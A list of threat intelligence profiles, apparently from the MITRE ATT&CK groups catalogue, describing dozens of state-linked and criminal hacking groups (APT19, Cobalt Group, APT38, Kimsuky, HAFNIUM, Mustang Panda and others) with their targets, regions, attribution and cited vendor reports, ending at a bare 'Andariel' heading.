APT19 is a China-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. In 2017, a phishing campaign was used to target seven law and investment firms. [FireEye APT19](https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html) Some analysts track APT19 and Deep Panda as the same group, but it is unclear from open source information if the groups are the same. [ICIT China's Espionage Jul 2016](https://web.archive.org/web/20171017072306/https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/) [FireEye APT Groups](https://www.fireeye.com/current-threats/apt-groups.html#apt19) [Unit 42 C0d0so0 Jan 2016](https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/)

Rancor

Rancor is a threat group that has led targeted campaigns against the South East Asia region. Rancor uses politically-motivated lures to entice victims to open malicious documents. [Rancor Unit42 June 2018](https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/)

Thrip

Thrip is an espionage group that has targeted satellite communications, telecoms, and defense contractor companies in the U.S. and Southeast Asia. The group uses custom malware as well as "living off the land" techniques. [Symantec Thrip June 2018](https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets)

Leafminer

Leafminer is an Iranian threat group that has targeted government organizations and business entities in the Middle East since at least early 2017. [Symantec Leafminer July 2018](https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east)

Gorgon Group

Gorgon Group is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. [Unit 42 Gorgon Group Aug 2018](https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/)

DarkHydrus

DarkHydrus is a threat group that has targeted government agencies and educational institutions in the Middle East since at least 2016. The group heavily leverages open-source tools and custom payloads for carrying out attacks. [Unit 42 DarkHydrus July 2018](https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/) [Unit 42 Playbook Dec 2017](https://pan-unit42.github.io/playbook_viewer/)

Cobalt Group

Cobalt Group is a financially motivated threat group that has primarily targeted financial institutions since at least 2016. The group has conducted intrusions to steal money via targeting ATM systems, card processing, payment systems and SWIFT systems. Cobalt Group has mainly targeted banks in Eastern Europe, Central Asia, and Southeast Asia. One of the alleged leaders was arrested in Spain in early 2018, but the group still appears to be active. The group has been known to target organizations in order to use their access to then compromise additional victims. [Talos Cobalt Group July 2018](https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html) [PTSecurity Cobalt Group Aug 2017](https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf) [PTSecurity Cobalt Dec 2016](https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf) [Group IB Cobalt Aug 2017](https://www.group-ib.com/blog/cobalt) [Proofpoint Cobalt June 2017](https://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-target) [RiskIQ Cobalt Nov 2017](https://web.archive.org/web/20190508170630/https://www.riskiq.com/blog/labs/cobalt-strike/) [RiskIQ Cobalt Jan 2018](https://web.archive.org/web/20190508170147/https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/) Reporting indicates there may be links between Cobalt Group and both the malware Carbanak and the group Carbanak. [Europol Cobalt Mar 2018](https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain)

Tropic Trooper

Tropic Trooper is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan, the Philippines, and Hong Kong. Tropic Trooper focuses on targeting government, healthcare, transportation, and high-tech industries and has been active since 2011. [TrendMicro Tropic Trooper Mar 2018](https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/) [Unit 42 Tropic Trooper Nov 2016](https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/) [TrendMicro Tropic Trooper May 2020](https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf)

APT38

APT38 is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau. [CISA AA20-239A BeagleBoyz August 2020](https://us-cert.cisa.gov/ncas/alerts/aa20-239a) Active since at least 2014, APT38 has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which APT38 stole $81 million, as well as attacks against Bancomext [FireEye APT38 Oct 2018](https://services.google.com/fh/files/misc/apt38-un-usual-suspects.pdf) and Banco de Chile [FireEye APT38 Oct 2018](https://services.google.com/fh/files/misc/apt38-un-usual-suspects.pdf); some of their attacks have been destructive. [CISA AA20-239A BeagleBoyz August 2020](https://us-cert.cisa.gov/ncas/alerts/aa20-239a) [FireEye APT38 Oct 2018](https://services.google.com/fh/files/misc/apt38-un-usual-suspects.pdf) [DOJ North Korea Indictment Feb 2021](https://www.justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and) [Kaspersky Lazarus Under The Hood Blog 2017](https://securelist.com/lazarus-under-the-hood/77908/) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name Lazarus Group instead of tracking clusters or subgroups.

SilverTerrier

SilverTerrier is a Nigerian threat group that has been active since 2014. SilverTerrier mainly targets organizations in high technology, higher education, and manufacturing. [Unit42 SilverTerrier 2018](https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/unit42-silverterrier-rise-of-nigerian-business-email-compromise) [Unit42 SilverTerrier 2016](https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/silverterrier-next-evolution-in-nigerian-cybercrime.pdf)

Gallmaker

Gallmaker is a cyberespionage group that has targeted victims in the Middle East and has been active since at least December 2017. The group has mainly targeted victims in the defense, military, and government sectors. [Symantec Gallmaker Oct 2018](https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group)

FIN4

FIN4 is a financially-motivated threat group that has targeted confidential information related to the public financial market, particularly regarding healthcare and pharmaceutical companies, since at least 2013. [FireEye Hacking FIN4 Dec 2014](https://www.mandiant.com/sites/default/files/2021-09/rpt-fin4.pdf) [FireEye FIN4 Stealing Insider NOV 2014](https://web.archive.org/web/20190508171649/https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html) FIN4 is unique in that they do not infect victims with typical persistent malware, but rather they focus on capturing credentials authorized to access email and other non-public correspondence. [FireEye Hacking FIN4 Dec 2014](https://www.mandiant.com/sites/default/files/2021-09/rpt-fin4.pdf) [FireEye Hacking FIN4 Video Dec 2014](https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html)

APT39

APT39 is one of several names for cyber espionage activity conducted by the Iranian Ministry of Intelligence and Security (MOIS) through the front company Rana Intelligence Computing since at least 2014. APT39 has primarily targeted the travel, hospitality, academic, and telecommunications industries in Iran and across Asia, Africa, Europe, and North America to track individuals and entities considered to be a threat by the MOIS. [FireEye APT39 Jan 2019](https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html) [Symantec Chafer Dec 2015](https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets) [FBI FLASH APT39 September 2020](https://www.iranwatch.org/sites/default/files/public-intelligence-alert.pdf) [Dept. of Treasury Iran Sanctions September 2020](https://home.treasury.gov/news/press-releases/sm1127) [DOJ Iran Indictments September 2020](https://www.justice.gov/opa/pr/department-justice-and-partner-departments-and-agencies-conduct-coordinated-actions-disrupt)

TEMP.Veles

TEMP.Veles is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing TRITON, a malware framework designed to manipulate industrial safety systems. [FireEye TRITON 2019](https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html) [FireEye TEMP.Veles 2018](https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html) [FireEye TEMP.Veles JSON April 2019](https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html)

The White Company

The White Company is a likely state-sponsored threat actor with advanced capabilities. From 2017 through 2018, the group led an espionage campaign called Operation Shaheen targeting government and military organizations in Pakistan. [Cylance Shaheen Nov 2018](https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/WhiteCompanyOperationShaheenReport.pdf?_ga=2.161661948.1943296560.1555683782-1066572390.1555511517)

WIRTE

WIRTE is a cyberespionage actor, believed to be a subgroup of the Hamas-affiliated Gaza Cybergang, that has been active since at least August 2018. WIRTE has targeted diplomatic, financial, military, legal, and technology organizations across the Middle East, North Africa, and in Europe to gather intelligence. WIRTE has remained persistently active despite the ongoing Israel-Hamas conflict and has expanded their operations to include wiper malware attacks against Israeli targets. [Lab52 WIRTE Apr 2019](https://lab52.io/blog/wirte-group-attacking-the-middle-east/) [Kaspersky WIRTE November 2021](https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044) [Check Point Wirte NOV 2024](https://research.checkpoint.com/2024/hamas-affiliated-threat-actor-expands-to-disruptive-activity/) [Palo Alto Ashen Lepus DEC 2025](https://unit42.paloaltonetworks.com/hamas-affiliate-ashen-lepus-uses-new-malware-suite-ashtag/)

Silence

Silence is a financially motivated threat actor targeting financial institutions in different countries. The group was first seen in June 2016. Their main targets reside in Russia, Ukraine, Belarus, Azerbaijan, Poland and Kazakhstan. They compromised various banking systems, including the Russian Central Bank's Automated Workstation Client, ATMs, and card processing. [Cyber Forensicator Silence Jan 2019](https://web.archive.org/web/20220119133748/https://cyberforensicator.com/2019/01/20/silence-dissecting-malicious-chm-files-and-performing-forensic-analysis/) [SecureList Silence Nov 2017](https://securelist.com/the-silence/83009/)

GALLIUM

GALLIUM is a cyberespionage group that has been active since at least 2012, primarily targeting telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam. This group is particularly known for launching Operation Soft Cell, a long-term campaign targeting telecommunications providers. [Cybereason Soft Cell June 2019](https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers) Security researchers have identified GALLIUM as a likely Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors. [Cybereason Soft Cell June 2019](https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers) [Microsoft GALLIUM December 2019](https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/) [Unit 42 PingPull Jun 2022](https://unit42.paloaltonetworks.com/pingpull-gallium/)

Kimsuky

Kimsuky is a North Korea-based cyber espionage group that has been active since at least 2012. The group initially targeted South Korean government agencies, think tanks, and subject-matter experts in various fields. Its operations expanded to include the United Nations and organizations in the government, education, business services, and manufacturing sectors across the United States, Japan, Russia, and Europe. Kimsuky has focused collection on foreign policy and national security issues tied to the Korean Peninsula, nuclear policy, and sanctions. Its operations have overlapped with other DPRK actors, likely due to ad hoc collaboration or limited resource sharing. [EST Kimsuky April 2019](https://blog.alyac.co.kr/2234) [Cybereason Kimsuky November 2020](https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite) [Malwarebytes Kimsuky June 2021](https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/) [CISA AA20-301A Kimsuky](https://us-cert.cisa.gov/ncas/alerts/aa20-301a) [Mandiant APT43 March 2024](https://services.google.com/fh/files/misc/apt43-report-en.pdf) [Proofpoint TA427 April 2024](https://www.proofpoint.com/us/blog/threat-insight/social-engineering-dmarc-abuse-ta427s-art-information-gathering) Because of overlapping operations, some researchers group a wide range of North Korean state-sponsored cyber activity under the broader Lazarus Group umbrella rather than tracking separate subgroup or cluster distinctions. Kimsuky was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019). [Netscout Stolen Pencil Dec 2018](https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/) [EST Kimsuky SmokeScreen April 2019](https://blog.alyac.co.kr/attachment/cfile5.uf@99A0CD415CB67E210DCEB3.pdf) [AhnLab Kimsuky Kabar Cobra Feb 2019](https://global.ahnlab.com/global/upload/download/techreport/%5BAnalysis_Report%5DOperation%20Kabar%20Cobra.pdf) In 2023, Kimsuky was observed using commercial large language models to assist with vulnerability research, scripting, social engineering and reconnaissance. [MSFT-AI](https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/)

Machete

Machete is a suspected Spanish-speaking cyber espionage group that has been active since at least 2010. It has primarily focused its operations within Latin America, with a particular emphasis on Venezuela, but also in the US, Europe, Russia, and parts of Asia. Machete generally targets high-profile organizations such as government institutions, intelligence services, and military units, as well as telecommunications and power companies. [Cylance Machete Mar 2017](https://threatvector.cylance.com/en_us/home/el-machete-malware-attacks-cut-through-latam.html) [Securelist Machete Aug 2014](https://securelist.com/el-machete/66108/) [ESET Machete July 2019](https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf) [360 Machete Sep 2020](https://blog.360totalsecurity.com/en/apt-c-43-steals-venezuelan-military-secrets-to-provide-intelligence-support-for-the-reactionaries-hpreact-campaign/)

BlackTech

BlackTech is a suspected Chinese cyber espionage group that has primarily targeted organizations in East Asia, particularly Taiwan, Japan, and Hong Kong, and the US since at least 2013. BlackTech has used a combination of custom malware, dual-use tools, and living off the land tactics to compromise media, construction, engineering, electronics, and financial company networks. [TrendMicro BlackTech June 2017](https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/) [Symantec Palmerworm Sep 2020](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt) [Reuters Taiwan BlackTech August 2020](https://www.reuters.com/article/us-taiwan-cyber-china/taiwan-says-china-behind-cyberattacks-on-government-agencies-emails-idUSKCN25F0JK)

APT-C-36

APT-C-36 is a suspected South American espionage group that has been active since at least 2018. The group mainly targets Colombian government institutions as well as important corporations in the financial sector, petroleum industry, and professional manufacturing. [QiAnXin APT-C-36 Feb2019](https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/)

Inception

Inception is a cyber espionage group active since at least 2014. The group has targeted multiple industries and governmental entities primarily in Russia, but has also been active in the United States and throughout Europe, Asia, Africa, and the Middle East. [Unit 42 Inception November 2018](https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/) [Symantec Inception Framework March 2018](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies) [Kaspersky Cloud Atlas December 2014](https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/)

Mofang

Mofang is a likely China-based cyber espionage group, named for its frequent practice of imitating a victim's infrastructure. This adversary has been observed since at least May 2012 conducting focused attacks against government and critical infrastructure in Myanmar, as well as several other countries and sectors including military, automobile, and weapons industries. [FOX-IT May 2016 Mofang](https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf)

DarkVishnya

DarkVishnya is a financially motivated threat actor targeting financial institutions in Eastern Europe. In 2017-2018 the group attacked at least 8 banks in this region. [Securelist DarkVishnya Dec 2018](https://securelist.com/darkvishnya/89169/)

Rocke

Rocke is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name Rocke comes from the email address "rocke@live.cn" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between Rocke and the Iron Cybercrime Group, though this attribution has not been confirmed. [Talos Rocke August 2018](https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html)

Whitefly

Whitefly is a cyber espionage group that has been operating since at least 2017. The group has targeted organizations based mostly in Singapore across a wide variety of sectors, and is primarily interested in stealing large amounts of sensitive information. The group has been linked to an attack against Singapore’s largest public health organization, SingHealth. [Symantec Whitefly March 2019](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore)

Blue Mockingbird

Blue Mockingbird is a cluster of observed activity involving Monero cryptocurrency-mining payloads in dynamic-link library (DLL) form on Windows systems. The earliest observed Blue Mockingbird tools were created in December 2019. [RedCanary Mockingbird May 2020](https://redcanary.com/blog/blue-mockingbird-cryptominer/)

Windshift

Windshift is a threat group that has been active since at least 2017, targeting specific individuals for surveillance in government departments and critical infrastructure across the Middle East. [SANS Windshift August 2018](https://www.scribd.com/document/661837258/WINDSHIFT-summit-archive-1554718868) [objective-see windtail1 dec 2018](https://objective-see.com/blog/blog_0x3B.html) [objective-see windtail2 jan 2019](https://objective-see.com/blog/blog_0x3D.html)

Chimera

Chimera is a suspected China-based threat group that has been active since at least 2018 targeting the semiconductor industry in Taiwan as well as data from the airline industry. [Cycraft Chimera April 2020](https://cycraft.com/download/CyCraft-Whitepaper-Chimera_V4.1.pdf) [NCC Group Chimera January 2021](https://web.archive.org/web/20230218064220/https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/)

GOLD SOUTHFIELD

GOLD SOUTHFIELD is a financially motivated threat group active since at least 2018 that operates the REvil Ransomware-as-a-Service (RaaS). GOLD SOUTHFIELD provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments. By early 2020, GOLD SOUTHFIELD started capitalizing on the new trend of stealing data and further extorting the victim to pay for their data to not get publicly leaked. [Secureworks REvil September 2019](https://www.secureworks.com/research/revil-sodinokibi-ransomware) [Secureworks GandCrab and REvil September 2019](https://www.secureworks.com/blog/revil-the-gandcrab-connection) [Secureworks GOLD SOUTHFIELD](https://www.secureworks.com/research/threat-profiles/gold-southfield) [CrowdStrike Evolution of Pinchy Spider July 2021](https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/)

Fox Kitten

Fox Kitten is a threat actor with a suspected nexus to the Iranian government that has been active since at least 2017 against entities in the Middle East, North Africa, Europe, Australia, and North America. Fox Kitten has targeted multiple industrial verticals including oil and gas, technology, government, defense, healthcare, manufacturing, and engineering. [ClearSky Fox Kitten February 2020](https://www.clearskysec.com/fox-kitten/) [CrowdStrike PIONEER KITTEN August 2020](https://www.crowdstrike.com/blog/who-is-pioneer-kitten/) [Dragos PARISITE](https://www.dragos.com/threat/parisite/) [ClearSky Pay2Kitten December 2020](https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf)

Indrik Spider

Indrik Spider is a Russia-based cybercriminal group that has been active since at least 2014. Indrik Spider started with the Dridex banking Trojan, and by 2017 it began running ransomware operations using BitPaymer, WastedLocker, and Hades ransomware. Following U.S. sanctions and an indictment in 2019, Indrik Spider changed its tactics and diversified its toolset. [Crowdstrike Indrik November 2018](https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/) [Crowdstrike EvilCorp March 2021](https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/) [Treasury EvilCorp Dec 2019](https://home.treasury.gov/news/press-releases/sm845)

Evilnum

Evilnum is a financially motivated threat group that has been active since at least 2018. [ESET EvilNum July 2020](https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/)

Sidewinder

Sidewinder is a suspected Indian threat actor group that has been active since at least 2012. They have been observed targeting government, military, and business entities throughout Asia, primarily focusing on Pakistan, China, Nepal, and Afghanistan. [ATT Sidewinder January 2021](https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf) [Securelist APT Trends April 2018](https://securelist.com/apt-trends-report-q1-2018/85280/) [Cyble Sidewinder September 2020](https://cybleinc.com/2020/09/26/sidewinder-apt-targets-with-futuristic-tactics-and-techniques/)

Silent Librarian

Silent Librarian is a group that has targeted research and proprietary data at universities, government agencies, and private sector companies worldwide since at least 2013. Members of Silent Librarian are known to have been affiliated with the Iran-based Mabna Institute, which has conducted cyber intrusions at the behest of the government of Iran, specifically the Islamic Revolutionary Guard Corps (IRGC). [DOJ Iran Indictments March 2018](https://www.justice.gov/usao-sdny/press-release/file/1045781/download) [Phish Labs Silent Librarian](https://info.phishlabs.com/blog/silent-librarian-more-to-the-story-of-the-iranian-mabna-institute-indictment) [Malwarebytes Silent Librarian October 2020](https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/)

Volatile Cedar

Volatile Cedar is a Lebanese threat group that has targeted individuals, companies, and institutions worldwide. Volatile Cedar has been operating since 2012 and is motivated by political and ideological interests. [CheckPoint Volatile Cedar March 2015](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf) [ClearSky Lebanese Cedar Jan 2021](https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf)

Windigo

The Windigo group has been operating since at least 2011, compromising thousands of Linux and Unix servers using the Ebury SSH backdoor to create a spam botnet. Despite law enforcement intervention against the creators, Windigo operators continued updating Ebury through 2019. [ESET Windigo Mar 2014](https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/) [CERN Windigo June 2019](https://security.web.cern.ch/advisories/windigo/windigo.shtml)

HAFNIUM

HAFNIUM is a likely state-sponsored cyber espionage group operating out of China that has been active since at least January 2021. HAFNIUM primarily targets entities in the US across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs. HAFNIUM has targeted remote management tools and cloud software for initial access and has demonstrated an ability to quickly operationalize exploits for identified vulnerabilities in edge devices. [Microsoft HAFNIUM March 2020](https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/) [Volexity Exchange Marauder March 2021](https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/) [Microsoft Silk Typhoon MAR 2025](https://www.microsoft.com/en-us/security/blog/2025/03/05/silk-typhoon-targeting-it-supply-chain/)

Higaisa

Higaisa is a threat group suspected to have South Korean origins. Higaisa has targeted government, public, and trade organizations in North Korea; however, they have also carried out attacks in China, Japan, Russia, Poland, and other nations. Higaisa was first disclosed in early 2019 but is assessed to have operated as early as 2009. [Malwarebytes Higaisa 2020](https://blog.malwarebytes.com/threat-analysis/2020/06/higaisa/) [Zscaler Higaisa 2020](https://www.zscaler.com/blogs/security-research/return-higaisa-apt) [PTSecurity Higaisa 2020](https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/)

TA551

TA551 is a financially-motivated threat group that has been active since at least 2018. [Secureworks GOLD CABIN](https://www.secureworks.com/research/threat-profiles/gold-cabin) The group has primarily targeted English, German, Italian, and Japanese speakers through email-based malware distribution campaigns. [Unit 42 TA551 Jan 2021](https://unit42.paloaltonetworks.com/ta551-shathak-icedid/)

ZIRCONIUM

ZIRCONIUM is a threat group operating out of China, active since at least 2017, that has targeted individuals associated with the 2020 US presidential election and prominent leaders in the international affairs community. [Microsoft Targeting Elections September 2020](https://blogs.microsoft.com/on-the-issues/2020/09/10/cyberattacks-us-elections-trump-biden/) [Check Point APT31 February 2021](https://research.checkpoint.com/2021/the-story-of-jian/)

Mustang Panda

Mustang Panda is a China-based cyber espionage threat actor that has been conducting operations since at least 2012. Mustang Panda has been known to use tailored phishing lures and decoy documents to deliver malicious payloads. Mustang Panda has targeted government, diplomatic, and non-governmental organizations, including think tanks, religious institutions, and research entities, across the United States, Europe, and Asia, with notable activity in Russia, Mongolia, Myanmar, Pakistan, and Vietnam. [BlackBerry MUSTANG PANDA October 2022](https://blogs.blackberry.com/en/2022/10/mustang-panda-abuses-legitimate-apps-to-target-myanmar-based-victims) [Eset PlugX Korplug Mustang Panda March 2022](https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/) [Anomali MUSTANG PANDA October 2019](https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations) [Cisco Talos MUSTANG PANDA PLUGX PUBLOAD MAY 2022](https://blog.talosintelligence.com/mustang-panda-targets-europe/) [Secureworks BRONZE PRESIDENT December 2019](https://www.secureworks.com/research/bronze-president-targets-ngos) [DOJ Affidavit Search and Seizure PlugX December 2024](https://www.justice.gov/archives/opa/media/1384136/dl) [EclecticIQ Mustang Panda PlugX](https://blog.eclecticiq.com/mustang-panda-apt-group-uses-european-commission-themed-lure-to-deliver-plugx-malware) [ATTACKIQ MUSTANG PANDA TONESHELL March 2023](https://www.attackiq.com/2023/03/23/emulating-the-politically-motivated-chinese-apt-mustang-panda/) [Crowdstrike MUSTANG PANDA June 2018](https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/) [Palo Alto Networks, Unit 42](https://unit42.paloaltonetworks.com/stately-taurus-uses-bookworm-malware/) [Sophos PlugX September 2022](https://www.secureworks.com/blog/bronze-president-targets-russian-speakers-with-updated-plugx) [Sophos Mustang Panda PLUGX](https://www.secureworks.com/blog/bronze-president-targets-government-officials) [Zscaler](https://www.zscaler.com/blogs/security-research/latest-mustang-panda-arsenal-toneshell-and-starproxy-p1)

Ajax Security Team

Ajax Security Team is a group that has been active since at least 2010 and is believed to be operating out of Iran. By 2014 Ajax Security Team had transitioned from website defacement operations to malware-based cyber espionage campaigns targeting the US defense industrial base and Iranian users of anti-censorship technologies. [FireEye Operation Saffron Rose 2013](https://www.mandiant.com/sites/default/files/2021-09/rpt-operation-saffron-rose.pdf)

Tonto Team

Tonto Team is a suspected Chinese state-sponsored cyber espionage threat group that has primarily targeted South Korea, Japan, Taiwan, and the United States since at least 2009; by 2020 they expanded operations to include other Asian as well as Eastern European countries. Tonto Team has targeted government, military, energy, mining, financial, education, healthcare, and technology organizations, including through the Heartbeat Campaign (2009-2012) and Operation Bitter Biscuit (2017). [Kaspersky CactusPete Aug 2020](https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/) [ESET Exchange Mar 2021](https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/) [FireEye Chinese Espionage October 2019](https://web.archive.org/web/20210308054208/https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf) [ARS Technica China Hack SK April 2017](https://arstechnica.com/information-technology/2017/04/researchers-claim-china-trying-to-hack-south-korea-missile-defense-efforts/) [Trend Micro HeartBeat Campaign January 2013](https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the-heartbeat-apt-campaign.pdf?) [Talos Bisonal 10 Years March 2020](https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html)

Nomadic Octopus

Nomadic Octopus is a Russian-speaking cyber espionage threat group that has primarily targeted Central Asia, including local governments, diplomatic missions, and individuals, since at least 2014. Nomadic Octopus has been observed conducting campaigns involving Android and Windows malware, mainly using the Delphi programming language, and building custom variants. [Security Affairs DustSquad Oct 2018](https://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.html) [Securelist Octopus Oct 2018](https://securelist.com/octopus-infested-seas-of-central-asia/88200/) [ESET Nomadic Octopus 2018](https://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdf)

Transparent Tribe

Transparent Tribe is a suspected Pakistan-based threat group that has been active since at least 2013, primarily targeting diplomatic, defense, and research organizations in India and Afghanistan. [Proofpoint Operation Transparent Tribe March 2016](https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf) [Kaspersky Transparent Tribe August 2020](https://securelist.com/transparent-tribe-part-1/98127/) [Talos Transparent Tribe May 2021](https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html)

BackdoorDiplomacy

BackdoorDiplomacy is a cyber espionage threat group that has been active since at least 2017. BackdoorDiplomacy has targeted Ministries of Foreign Affairs and telecommunication companies in Africa, Europe, the Middle East, and Asia. [ESET BackdoorDiplomacy Jun 2021](https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/)

IndigoZebra

IndigoZebra is a suspected Chinese cyber espionage group that has been targeting Central Asian governments since at least 2014. [HackerNews IndigoZebra July 2021](https://thehackernews.com/2021/07/indigozebra-apt-hacking-campaign.html) [Checkpoint IndigoZebra July 2021](https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/) [Securelist APT Trends Q2 2017](https://securelist.com/apt-trends-report-q2-2017/79332/)

Ferocious Kitten

Ferocious Kitten is a threat group that has primarily targeted Persian-speaking individuals in Iran since at least 2015. [Kaspersky Ferocious Kitten Jun 2021](https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/)

Andariel

